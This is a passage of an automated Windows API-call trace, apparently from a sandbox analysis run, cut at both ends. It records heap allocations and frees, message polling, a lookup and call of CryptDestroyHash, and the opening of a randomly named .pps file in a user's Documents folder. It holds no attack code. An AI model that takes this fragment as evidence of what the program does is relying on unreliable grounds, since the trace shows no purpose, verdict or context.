Flags=0x0, Size=0x10) returned 0x2e51e38 [0266.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0266.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0266.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0266.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0266.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0266.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0266.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0266.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0266.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0266.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0266.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0266.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0266.789] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0266.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0266.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0266.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0266.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0266.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0266.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0266.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0266.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0266.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0266.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0266.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0266.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0266.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0266.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0266.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0266.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0266.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0266.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0266.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69b08 [0266.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69b08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0266.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0266.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0266.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0266.791] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0266.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0266.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0266.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0266.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0266.791] CryptDestroyHash (hHash=0xa87290) returned 1 [0266.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14b00 [0266.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0266.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0266.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0266.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0266.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0266.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0266.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0266.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0266.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0266.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0266.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0266.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0266.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0266.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0266.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0266.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0266.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0266.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0266.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0266.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0266.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0266.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0266.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0266.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0266.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0266.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0266.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0266.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0266.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0266.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0266.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14b00 | out: hHeap=0x970000) returned 1 [0266.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0266.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0266.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0266.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0266.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0266.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0266.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0266.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0266.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0266.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0266.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0266.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0266.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0266.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0266.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0266.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0266.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0266.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0266.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0266.793] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0266.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0266.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0266.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0266.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0266.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0266.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0266.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0266.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0266.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0266.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0266.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0266.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0266.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0266.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0266.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0266.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0266.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0266.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0266.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0266.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0266.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0266.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0266.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0266.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0266.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0266.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0266.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0266.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0266.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0266.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52000 | out: hHeap=0x970000) returned 1 [0266.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0266.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15a18 | out: hHeap=0x970000) returned 1 [0266.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0266.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0266.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0266.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0266.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0266.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0266.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0266.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0266.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0266.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0266.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0266.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0266.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0266.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0266.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0266.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0266.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0266.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0266.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0266.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0266.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0266.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0266.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0266.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54710 | out: hHeap=0x970000) returned 1 [0266.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0266.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0266.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0266.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0266.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0266.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0266.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0266.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0266.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0266.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0266.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0266.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0266.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0266.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0266.795] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0266.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0266.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0266.796] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0266.796] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0266.796] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0266.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0266.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0266.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0266.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0266.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0266.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0266.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0266.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0266.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0266.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0266.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0266.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0266.797] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/pFCcGpVbcXPSBWLa.pps" (normalized: "c:\\users\\fd1hvy\\documents\\pfccgpvbcxpsbwla.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0266.797] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0266.797] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0266.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0266.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0266.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0266.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0266.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0266.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0266.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0266.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0266.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0266.797] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0266.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0266.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0266.798] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0266.798] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0266.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0266.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0266.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0266.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0266.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0266.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0266.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 